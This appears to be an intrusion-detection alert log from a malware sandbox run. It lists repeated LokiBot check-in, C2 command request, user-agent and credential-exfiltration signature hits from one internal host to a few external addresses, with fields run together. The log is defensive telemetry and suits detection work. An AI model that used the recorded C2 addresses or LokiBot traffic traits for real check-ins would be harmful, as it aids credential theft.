                      05/23/24-20:18:37.677256TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921780192.168.2.22188.114.96.3
                      05/23/24-20:19:05.135747TCP2025381ET TROJAN LokiBot Checkin4924780192.168.2.22188.114.97.9
                      05/23/24-20:19:06.064261TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924880192.168.2.22188.114.96.3
                      05/23/24-20:17:35.132025TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916480192.168.2.22188.114.97.3
                      05/23/24-20:18:22.772748TCP2025381ET TROJAN LokiBot Checkin4920680192.168.2.22188.114.96.3
                      05/23/24-20:18:30.098368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921480192.168.2.22188.114.96.9
                      05/23/24-20:17:42.120355TCP2025381ET TROJAN LokiBot Checkin4916980192.168.2.22188.114.96.3
                      05/23/24-20:18:42.915752TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922380192.168.2.22188.114.97.3
                      05/23/24-20:17:54.073092TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918180192.168.2.22188.114.96.3
                      05/23/24-20:19:00.429820TCP2025381ET TROJAN LokiBot Checkin4924280192.168.2.22188.114.96.3
                      05/23/24-20:17:50.058542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917780192.168.2.22188.114.96.9
                      05/23/24-20:18:39.381191TCP2825766ETPRO TROJAN LokiBot Checkin M24921980192.168.2.22188.114.97.3
                      05/23/24-20:17:45.155201TCP2025381ET TROJAN LokiBot Checkin4917280192.168.2.22188.114.96.3
                      05/23/24-20:18:00.736741TCP2825766ETPRO TROJAN LokiBot Checkin M24918780192.168.2.22188.114.96.3
                      05/23/24-20:17:56.049434TCP2825766ETPRO TROJAN LokiBot Checkin M24918280192.168.2.22188.114.96.3
                      05/23/24-20:18:25.484710TCP2025381ET TROJAN LokiBot Checkin4920980192.168.2.22188.114.97.3
                      05/23/24-20:17:54.073092TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918180192.168.2.22188.114.96.3
                      05/23/24-20:18:47.441038TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922880192.168.2.22188.114.96.3
                      05/23/24-20:18:41.210686TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922180192.168.2.22188.114.97.3
                      05/23/24-20:18:50.061779TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923180192.168.2.22188.114.96.3
                      05/23/24-20:18:54.312724TCP2825766ETPRO TROJAN LokiBot Checkin M24923580192.168.2.22188.114.97.3
                      05/23/24-20:18:07.989686TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919480192.168.2.22188.114.96.3
                      05/23/24-20:18:28.376454TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921280192.168.2.22188.114.96.9
                      05/23/24-20:18:28.376454TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921280192.168.2.22188.114.96.9
                      05/23/24-20:18:57.792134TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923980192.168.2.22188.114.97.3
                      05/23/24-20:18:07.989686TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919480192.168.2.22188.114.96.3
                      05/23/24-20:18:03.278750TCP2825766ETPRO TROJAN LokiBot Checkin M24919080192.168.2.22188.114.96.3
                      05/23/24-20:18:44.730541TCP2025381ET TROJAN LokiBot Checkin4922580192.168.2.22188.114.97.3
                      05/23/24-20:18:40.275029TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922080192.168.2.22188.114.97.9
                      05/23/24-20:19:02.183841TCP2025381ET TROJAN LokiBot Checkin4924480192.168.2.22188.114.96.9
                      05/23/24-20:18:41.210686TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922180192.168.2.22188.114.97.3
                      05/23/24-20:18:50.061779TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923180192.168.2.22188.114.96.3
                      05/23/24-20:19:11.675767TCP2825766ETPRO TROJAN LokiBot Checkin M24925480192.168.2.22188.114.96.9
                      05/23/24-20:17:52.694696TCP2825766ETPRO TROJAN LokiBot Checkin M24918080192.168.2.22188.114.97.3
                      05/23/24-20:19:07.888746TCP2025381ET TROJAN LokiBot Checkin4925080192.168.2.22188.114.96.3
                      05/23/24-20:17:38.077506TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916680192.168.2.22188.114.97.3
                      05/23/24-20:17:43.183162TCP2825766ETPRO TROJAN LokiBot Checkin M24917080192.168.2.22188.114.97.9
                      05/23/24-20:18:27.512891TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921180192.168.2.22188.114.97.3
                      05/23/24-20:18:41.981231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922280192.168.2.22188.114.96.9
                      05/23/24-20:17:47.208604TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917480192.168.2.22188.114.97.3
                      05/23/24-20:17:56.984952TCP2025381ET TROJAN LokiBot Checkin4918380192.168.2.22188.114.97.3
                      05/23/24-20:18:58.594043TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924080192.168.2.22188.114.96.9
                      05/23/24-20:17:48.088333TCP2025381ET TROJAN LokiBot Checkin4917580192.168.2.22188.114.97.3
                      05/23/24-20:18:06.045591TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919280192.168.2.22188.114.97.3
                      05/23/24-20:18:19.988815TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920380192.168.2.22188.114.96.3
                      05/23/24-20:17:58.820260TCP2025381ET TROJAN LokiBot Checkin4918580192.168.2.22188.114.96.3
                      05/23/24-20:18:19.988815TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920380192.168.2.22188.114.96.3
                      05/23/24-20:19:10.741295TCP2025381ET TROJAN LokiBot Checkin4925380192.168.2.22188.114.97.3
                      05/23/24-20:18:07.107766TCP2825766ETPRO TROJAN LokiBot Checkin M24919380192.168.2.22188.114.97.3
                      05/23/24-20:18:20.882874TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920480192.168.2.22188.114.96.9
                      05/23/24-20:18:58.594043TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924080192.168.2.22188.114.96.9
                      05/23/24-20:18:06.045591TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919280192.168.2.22188.114.97.3
                      05/23/24-20:18:46.517579TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922780192.168.2.22188.114.96.9
                      05/23/24-20:18:08.948107TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919580192.168.2.22188.114.96.3
                      05/23/24-20:18:20.882874TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920480192.168.2.22188.114.96.9
                      05/23/24-20:18:57.792134TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923980192.168.2.22188.114.97.3
                      05/23/24-20:18:30.957362TCP2825766ETPRO TROJAN LokiBot Checkin M24921580192.168.2.22188.114.97.3
                      05/23/24-20:17:40.814233TCP2025381ET TROJAN LokiBot Checkin4916880192.168.2.22188.114.97.3
                      05/23/24-20:18:08.948107TCP2825766ETPRO TROJAN LokiBot Checkin M24919580192.168.2.22188.114.96.3
                      05/23/24-20:18:49.167216TCP2025381ET TROJAN LokiBot Checkin4923080192.168.2.22188.114.96.3
                      05/23/24-20:18:56.909324TCP2025381ET TROJAN LokiBot Checkin4923880192.168.2.22188.114.97.3
                      05/23/24-20:18:51.088057TCP2025381ET TROJAN LokiBot Checkin4923280192.168.2.22188.114.97.3
                      05/23/24-20:17:49.147570TCP2025381ET TROJAN LokiBot Checkin4917680192.168.2.22188.114.96.3
                      05/23/24-20:18:18.976087TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920280192.168.2.22188.114.96.9
                      05/23/24-20:19:15.184596TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925880192.168.2.22188.114.96.3
                      05/23/24-20:18:09.860809TCP2025381ET TROJAN LokiBot Checkin4919680192.168.2.22188.114.97.3
                      05/23/24-20:18:07.989686TCP2825766ETPRO TROJAN LokiBot Checkin M24919480192.168.2.22188.114.96.3
                      05/23/24-20:18:26.597772TCP2025381ET TROJAN LokiBot Checkin4921080192.168.2.22188.114.96.9
                      05/23/24-20:18:21.836224TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920580192.168.2.22188.114.96.3
                      05/23/24-20:19:09.943896TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925280192.168.2.22188.114.96.3
                      05/23/24-20:18:31.712532TCP2025381ET TROJAN LokiBot Checkin4921680192.168.2.22188.114.97.3
                      05/23/24-20:18:04.176231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919180192.168.2.22188.114.96.3
                      05/23/24-20:18:02.368807TCP2025381ET TROJAN LokiBot Checkin4918980192.168.2.22188.114.96.3
                      05/23/24-20:18:52.425128TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923380192.168.2.22188.114.97.3
                      05/23/24-20:18:30.957362TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921580192.168.2.22188.114.97.3
                      05/23/24-20:18:52.425128TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923380192.168.2.22188.114.97.3
                      05/23/24-20:18:01.557933TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918880192.168.2.22188.114.96.3
                      05/23/24-20:17:59.837093TCP2825766ETPRO TROJAN LokiBot Checkin M24918680192.168.2.22188.114.97.3
                      05/23/24-20:18:06.045591TCP2825766ETPRO TROJAN LokiBot Checkin M24919280192.168.2.22188.114.97.3
                      05/23/24-20:19:13.398917TCP2825766ETPRO TROJAN LokiBot Checkin M24925680192.168.2.22188.114.97.3
                      05/23/24-20:17:50.058542TCP2825766ETPRO TROJAN LokiBot Checkin M24917780192.168.2.22188.114.96.9
                      05/23/24-20:18:23.674890TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920780192.168.2.22188.114.96.3
                      05/23/24-20:19:04.226888TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924680192.168.2.22188.114.96.9
                      05/23/24-20:18:24.566045TCP2825766ETPRO TROJAN LokiBot Checkin M24920880192.168.2.22188.114.96.3
                      05/23/24-20:17:51.806006TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917980192.168.2.22188.114.96.3
                      05/23/24-20:19:04.226888TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924680192.168.2.22188.114.96.9
                      05/23/24-20:17:50.944456TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917880192.168.2.22188.114.96.3
                      05/23/24-20:19:09.943896TCP2825766ETPRO TROJAN LokiBot Checkin M24925280192.168.2.22188.114.96.3
                      05/23/24-20:19:18.441021TCP2025381ET TROJAN LokiBot Checkin4926280192.168.2.22188.114.96.3
                      05/23/24-20:17:46.332436TCP2025381ET TROJAN LokiBot Checkin4917380192.168.2.22188.114.96.3
                      05/23/24-20:19:07.020535TCP2825766ETPRO TROJAN LokiBot Checkin M24924980192.168.2.22188.114.96.3
                      05/23/24-20:18:03.278750TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919080192.168.2.22188.114.96.3
                      05/23/24-20:18:48.359257TCP2025381ET TROJAN LokiBot Checkin4922980192.168.2.22188.114.96.9
                      05/23/24-20:18:59.521470TCP2025381ET TROJAN LokiBot Checkin4924180192.168.2.22188.114.97.3
                      05/23/24-20:17:50.944456TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917880192.168.2.22188.114.96.3
                      05/23/24-20:17:59.837093TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918680192.168.2.22188.114.97.3
                      05/23/24-20:18:23.674890TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920780192.168.2.22188.114.96.3
                      05/23/24-20:17:36.624490TCP2025381ET TROJAN LokiBot Checkin4916580192.168.2.22188.114.96.9
                      05/23/24-20:18:28.376454TCP2825766ETPRO TROJAN LokiBot Checkin M24921280192.168.2.22188.114.96.9
                      05/23/24-20:17:35.132025TCP2825766ETPRO TROJAN LokiBot Checkin M24916480192.168.2.22188.114.97.3
                      05/23/24-20:17:44.106859TCP2025381ET TROJAN LokiBot Checkin4917180192.168.2.22188.114.97.3
                      05/23/24-20:17:43.183162TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917080192.168.2.22188.114.97.9
                      05/23/24-20:18:03.278750TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919080192.168.2.22188.114.96.3
                      05/23/24-20:19:07.020535TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924980192.168.2.22188.114.96.3
                      05/23/24-20:19:17.653379TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926180192.168.2.22188.114.96.3
                      05/23/24-20:18:53.400223TCP2025381ET TROJAN LokiBot Checkin4923480192.168.2.22188.114.96.3
                      05/23/24-20:17:43.183162TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917080192.168.2.22188.114.97.9
                      05/23/24-20:19:16.882044TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926080192.168.2.22188.114.96.3
                      05/23/24-20:17:46.332436TCP2825766ETPRO TROJAN LokiBot Checkin M24917380192.168.2.22188.114.96.3
                      05/23/24-20:18:46.517579TCP2025381ET TROJAN LokiBot Checkin4922780192.168.2.22188.114.96.9
                      05/23/24-20:19:16.882044TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926080192.168.2.22188.114.96.3
                      05/23/24-20:19:15.184596TCP2025381ET TROJAN LokiBot Checkin4925880192.168.2.22188.114.96.3
                      05/23/24-20:18:58.594043TCP2825766ETPRO TROJAN LokiBot Checkin M24924080192.168.2.22188.114.96.9
                      05/23/24-20:18:01.557933TCP2825766ETPRO TROJAN LokiBot Checkin M24918880192.168.2.22188.114.96.3
                      05/23/24-20:18:41.210686TCP2825766ETPRO TROJAN LokiBot Checkin M24922180192.168.2.22188.114.97.3
                      05/23/24-20:17:47.208604TCP2025381ET TROJAN LokiBot Checkin4917480192.168.2.22188.114.97.3
                      05/23/24-20:18:04.176231TCP2025381ET TROJAN LokiBot Checkin4919180192.168.2.22188.114.96.3
                      05/23/24-20:18:16.270962TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919980192.168.2.22188.114.96.3
                      05/23/24-20:18:51.088057TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923280192.168.2.22188.114.97.3
                      05/23/24-20:17:56.984952TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918380192.168.2.22188.114.97.3
                      05/23/24-20:18:00.736741TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918780192.168.2.22188.114.96.3
                      05/23/24-20:18:23.674890TCP2025381ET TROJAN LokiBot Checkin4920780192.168.2.22188.114.96.3
                      05/23/24-20:18:56.093323TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923780192.168.2.22188.114.97.3
                      05/23/24-20:18:06.045591TCP2025381ET TROJAN LokiBot Checkin4919280192.168.2.22188.114.97.3
                      05/23/24-20:18:17.156368TCP2825766ETPRO TROJAN LokiBot Checkin M24920080192.168.2.22188.114.96.3
                      05/23/24-20:18:00.736741TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918780192.168.2.22188.114.96.3
                      05/23/24-20:17:56.984952TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918380192.168.2.22188.114.97.3
                      05/23/24-20:19:06.064261TCP2025381ET TROJAN LokiBot Checkin4924880192.168.2.22188.114.96.3
                      05/23/24-20:17:38.077506TCP2825766ETPRO TROJAN LokiBot Checkin M24916680192.168.2.22188.114.97.3
                      05/23/24-20:18:56.909324TCP2825766ETPRO TROJAN LokiBot Checkin M24923880192.168.2.22188.114.97.3
                      05/23/24-20:18:43.784658TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922480192.168.2.22188.114.97.3
                      05/23/24-20:18:20.882874TCP2025381ET TROJAN LokiBot Checkin4920480192.168.2.22188.114.96.9
                      05/23/24-20:18:48.359257TCP2825766ETPRO TROJAN LokiBot Checkin M24922980192.168.2.22188.114.96.9
                      05/23/24-20:18:53.400223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923480192.168.2.22188.114.96.3
                      05/23/24-20:19:07.020535TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924980192.168.2.22188.114.96.3
                      05/23/24-20:18:18.976087TCP2825766ETPRO TROJAN LokiBot Checkin M24920280192.168.2.22188.114.96.9
                      05/23/24-20:18:25.484710TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920980192.168.2.22188.114.97.3
                      05/23/24-20:18:29.294238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921380192.168.2.22188.114.96.3
                      05/23/24-20:17:36.624490TCP2825766ETPRO TROJAN LokiBot Checkin M24916580192.168.2.22188.114.96.9
                      05/23/24-20:17:49.147570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917680192.168.2.22188.114.96.3
                      05/23/24-20:19:04.226888TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924680192.168.2.22188.114.96.9
                      05/23/24-20:19:18.441021TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926280192.168.2.22188.114.96.3
                      05/23/24-20:17:47.208604TCP2825766ETPRO TROJAN LokiBot Checkin M24917480192.168.2.22188.114.97.3
                      05/23/24-20:18:38.560340TCP2025381ET TROJAN LokiBot Checkin4921880192.168.2.22188.114.97.9
                      05/23/24-20:17:48.088333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917580192.168.2.22188.114.97.3
                      05/23/24-20:17:58.820260TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918580192.168.2.22188.114.96.3
                      05/23/24-20:17:44.106859TCP2825766ETPRO TROJAN LokiBot Checkin M24917180192.168.2.22188.114.97.3
                      05/23/24-20:17:48.088333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917580192.168.2.22188.114.97.3
                      05/23/24-20:17:58.820260TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918580192.168.2.22188.114.96.3
                      05/23/24-20:18:42.915752TCP2025381ET TROJAN LokiBot Checkin4922380192.168.2.22188.114.97.3
                      05/23/24-20:17:59.837093TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918680192.168.2.22188.114.97.3
                      05/23/24-20:19:07.888746TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925080192.168.2.22188.114.96.3
                      05/23/24-20:18:03.278750TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919080192.168.2.22188.114.96.3
                      05/23/24-20:17:50.944456TCP2825766ETPRO TROJAN LokiBot Checkin M24917880192.168.2.22188.114.96.3
                      05/23/24-20:17:59.837093TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918680192.168.2.22188.114.97.3
                      05/23/24-20:18:45.625277TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922680192.168.2.22188.114.96.3
                      05/23/24-20:19:07.888746TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925080192.168.2.22188.114.96.3
                      05/23/24-20:18:27.512891TCP2825766ETPRO TROJAN LokiBot Checkin M24921180192.168.2.22188.114.97.3
                      05/23/24-20:18:25.484710TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920980192.168.2.22188.114.97.3
                      05/23/24-20:19:07.020535TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924980192.168.2.22188.114.96.3
                      05/23/24-20:18:02.368807TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918980192.168.2.22188.114.96.3
                      05/23/24-20:19:08.863871TCP2825766ETPRO TROJAN LokiBot Checkin M24925180192.168.2.22188.114.96.3
                      05/23/24-20:17:35.132025TCP2025381ET TROJAN LokiBot Checkin4916480192.168.2.22188.114.97.3
                      05/23/24-20:19:05.135747TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924780192.168.2.22188.114.97.9
                      05/23/24-20:17:45.155201TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917280192.168.2.22188.114.96.3
                      05/23/24-20:18:24.566045TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920880192.168.2.22188.114.96.3
                      05/23/24-20:17:43.183162TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917080192.168.2.22188.114.97.9
                      05/23/24-20:17:45.155201TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917280192.168.2.22188.114.96.3
                      05/23/24-20:19:14.278026TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925780192.168.2.22188.114.96.3
                      05/23/24-20:18:18.079750TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920180192.168.2.22188.114.97.3
                      05/23/24-20:18:24.566045TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920880192.168.2.22188.114.96.3
                      05/23/24-20:18:29.294238TCP2825766ETPRO TROJAN LokiBot Checkin M24921380192.168.2.22188.114.96.3
                      05/23/24-20:19:12.597934TCP2025381ET TROJAN LokiBot Checkin4925580192.168.2.22188.114.96.3
                      05/23/24-20:18:07.989686TCP2025381ET TROJAN LokiBot Checkin4919480192.168.2.22188.114.96.3
                      05/23/24-20:18:39.381191TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921980192.168.2.22188.114.97.3
                      05/23/24-20:18:49.167216TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923080192.168.2.22188.114.96.3
                      05/23/24-20:18:54.312724TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923580192.168.2.22188.114.97.3
                      05/23/24-20:18:50.061779TCP2825766ETPRO TROJAN LokiBot Checkin M24923180192.168.2.22188.114.96.3
                      05/23/24-20:17:57.920775TCP2025381ET TROJAN LokiBot Checkin4918480192.168.2.22188.114.96.3
                      05/23/24-20:18:59.521470TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924180192.168.2.22188.114.97.3
                      05/23/24-20:18:26.597772TCP2825766ETPRO TROJAN LokiBot Checkin M24921080192.168.2.22188.114.96.9
                      05/23/24-20:18:49.167216TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923080192.168.2.22188.114.96.3
                      05/23/24-20:18:59.521470TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924180192.168.2.22188.114.97.3
                      05/23/24-20:18:30.098368TCP2025381ET TROJAN LokiBot Checkin4921480192.168.2.22188.114.96.9
                      05/23/24-20:19:11.675767TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925480192.168.2.22188.114.96.9
                      05/23/24-20:17:36.624490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916580192.168.2.22188.114.96.9
                      05/23/24-20:18:17.156368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920080192.168.2.22188.114.96.3
                      05/23/24-20:17:50.058542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917780192.168.2.22188.114.96.9
                      05/23/24-20:18:39.381191TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921980192.168.2.22188.114.97.3
                      05/23/24-20:18:55.233506TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923680192.168.2.22188.114.96.9
                      05/23/24-20:19:13.398917TCP2025381ET TROJAN LokiBot Checkin4925680192.168.2.22188.114.97.3
                      05/23/24-20:17:50.058542TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917780192.168.2.22188.114.96.9
                      05/23/24-20:18:11.714251TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919880192.168.2.22188.114.96.3
                      05/23/24-20:18:11.714251TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919880192.168.2.22188.114.96.3
                      05/23/24-20:18:52.425128TCP2025381ET TROJAN LokiBot Checkin4923380192.168.2.22188.114.97.3
                      05/23/24-20:18:30.957362TCP2025381ET TROJAN LokiBot Checkin4921580192.168.2.22188.114.97.3
                      05/23/24-20:18:16.270962TCP2825766ETPRO TROJAN LokiBot Checkin M24919980192.168.2.22188.114.96.3
                      05/23/24-20:17:39.511374TCP2025381ET TROJAN LokiBot Checkin4916780192.168.2.22188.114.97.3
                      05/23/24-20:18:51.088057TCP2825766ETPRO TROJAN LokiBot Checkin M24923280192.168.2.22188.114.97.3
                      05/23/24-20:18:47.441038TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922880192.168.2.22188.114.96.3
                      05/23/24-20:18:07.107766TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919380192.168.2.22188.114.97.3
                      05/23/24-20:18:37.677256TCP2025381ET TROJAN LokiBot Checkin4921780192.168.2.22188.114.96.3
                      05/23/24-20:18:50.061779TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923180192.168.2.22188.114.96.3
                      05/23/24-20:18:09.860809TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919680192.168.2.22188.114.97.3
                      05/23/24-20:18:09.860809TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919680192.168.2.22188.114.97.3
                      05/23/24-20:17:56.049434TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918280192.168.2.22188.114.96.3
                      05/23/24-20:18:40.275029TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922080192.168.2.22188.114.97.9
                      05/23/24-20:18:18.079750TCP2825766ETPRO TROJAN LokiBot Checkin M24920180192.168.2.22188.114.97.3
                      05/23/24-20:18:40.275029TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922080192.168.2.22188.114.97.9
                      05/23/24-20:19:14.278026TCP2825766ETPRO TROJAN LokiBot Checkin M24925780192.168.2.22188.114.96.3
                      05/23/24-20:18:22.772748TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920680192.168.2.22188.114.96.3
                      05/23/24-20:18:07.107766TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919380192.168.2.22188.114.97.3
                      05/23/24-20:17:56.049434TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918280192.168.2.22188.114.96.3
                      05/23/24-20:18:41.981231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922280192.168.2.22188.114.96.9
                      05/23/24-20:18:55.233506TCP2825766ETPRO TROJAN LokiBot Checkin M24923680192.168.2.22188.114.96.9
                      05/23/24-20:17:52.694696TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918080192.168.2.22188.114.97.3
                      05/23/24-20:18:41.981231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922280192.168.2.22188.114.96.9
                      05/23/24-20:17:40.814233TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24916880192.168.2.22188.114.97.3
                      05/23/24-20:18:19.988815TCP2825766ETPRO TROJAN LokiBot Checkin M24920380192.168.2.22188.114.96.3
                      05/23/24-20:17:40.814233TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14916880192.168.2.22188.114.97.3
                      05/23/24-20:18:19.988815TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920380192.168.2.22188.114.96.3
                      05/23/24-20:17:54.073092TCP2025381ET TROJAN LokiBot Checkin4918180192.168.2.22188.114.96.3
                      05/23/24-20:19:16.005968TCP2025381ET TROJAN LokiBot Checkin4925980192.168.2.22188.114.97.3
                      05/23/24-20:18:31.712532TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921680192.168.2.22188.114.97.3
                      05/23/24-20:18:31.712532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921680192.168.2.22188.114.97.3
                      05/23/24-20:18:10.679781TCP2025381ET TROJAN LokiBot Checkin4919780192.168.2.22188.114.96.3
                      05/23/24-20:19:01.377448TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924380192.168.2.22188.114.96.3
                      05/23/24-20:18:08.948107TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919580192.168.2.22188.114.96.3
                      05/23/24-20:19:01.377448TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924380192.168.2.22188.114.96.3
                      05/23/24-20:18:26.597772TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921080192.168.2.22188.114.96.9
                      05/23/24-20:19:03.316993TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924580192.168.2.22188.114.97.3
                      05/23/24-20:17:52.694696TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918080192.168.2.22188.114.97.3
                      05/23/24-20:18:08.948107TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919580192.168.2.22188.114.96.3
                      05/23/24-20:18:21.836224TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920580192.168.2.22188.114.96.3
                      05/23/24-20:18:25.484710TCP2825766ETPRO TROJAN LokiBot Checkin M24920980192.168.2.22188.114.97.3
                      05/23/24-20:19:07.020535TCP2025381ET TROJAN LokiBot Checkin4924980192.168.2.22188.114.96.3
                      05/23/24-20:19:09.943896TCP2025381ET TROJAN LokiBot Checkin4925280192.168.2.22188.114.96.3
                      05/23/24-20:19:18.441021TCP2825766ETPRO TROJAN LokiBot Checkin M24926280192.168.2.22188.114.96.3
                      05/23/24-20:18:07.107766TCP2025381ET TROJAN LokiBot Checkin4919380192.168.2.22188.114.97.3
                      05/23/24-20:18:56.909324TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923880192.168.2.22188.114.97.3
